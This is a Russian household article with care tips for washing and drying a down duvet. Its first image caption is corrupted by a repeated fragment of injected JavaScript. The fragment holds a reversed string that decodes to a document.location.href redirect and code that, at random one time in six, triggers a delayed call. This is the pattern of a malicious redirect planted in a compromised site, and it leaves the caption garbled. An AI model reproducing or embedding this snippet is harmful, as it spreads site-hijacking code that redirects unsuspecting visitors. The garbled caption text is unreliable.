Добавить в закладки

Как правильно почистить пуховое одеяло в домашних условиях

Если вы, не знаете, как чистить пуховое одеяло, не посещая химчистку, мы предложим вам несколько проверенных вариантов. И разберем их в этой статье, если же вам это интересно приглашаем к прочтению.

 

Перьевое одеяло. Источник: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tokrot.ru/public/95737405.jpg»>autobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tokrot.ru

Одним из роскошных моментов в жизни является погружение в мягкое одеяло в уютной спальне. Кажется, ваше тело погружено в море облаков, поэтому вы не хотите вставать с постели по утрам. Но есть только один недостаток — продукт требует особого ухода.

Правила стирки

 

Стирка. Источник: on-woman.com

Сначала используйте пододеяльник. Во-вторых, помните, что вы не должны мыть изделие слишком часто, потому что оно разрушает легкие перья внутри, старайтесь делать это не чаще одного раза в год, чтобы сохранить его как можно дольше.

Такие одеяла нельзя стирать в стандартных стиральных машинах, для этого вам понадобится машина с фронтальной загрузкой. Установите мягкий режим, используйте небольшое количество мягкого моющего средства.

Сушка пухового одеяла

 

Сушка. Источник: pravilauborki.ru

Сушка таких вещей является самой утомительной частью всего процесса и обычно занимает несколько часов. Для этого продукт следует помещать в объемную сушилку и извлекать из него каждые 45 минут, чтобы пух не оставался кусочками. Убедитесь, что оно сухое, прежде чем надевать пододеяльник. Даже небольшое количество влаги вызывает появление плесени.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: Александр
Опубликовано: 12.12.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: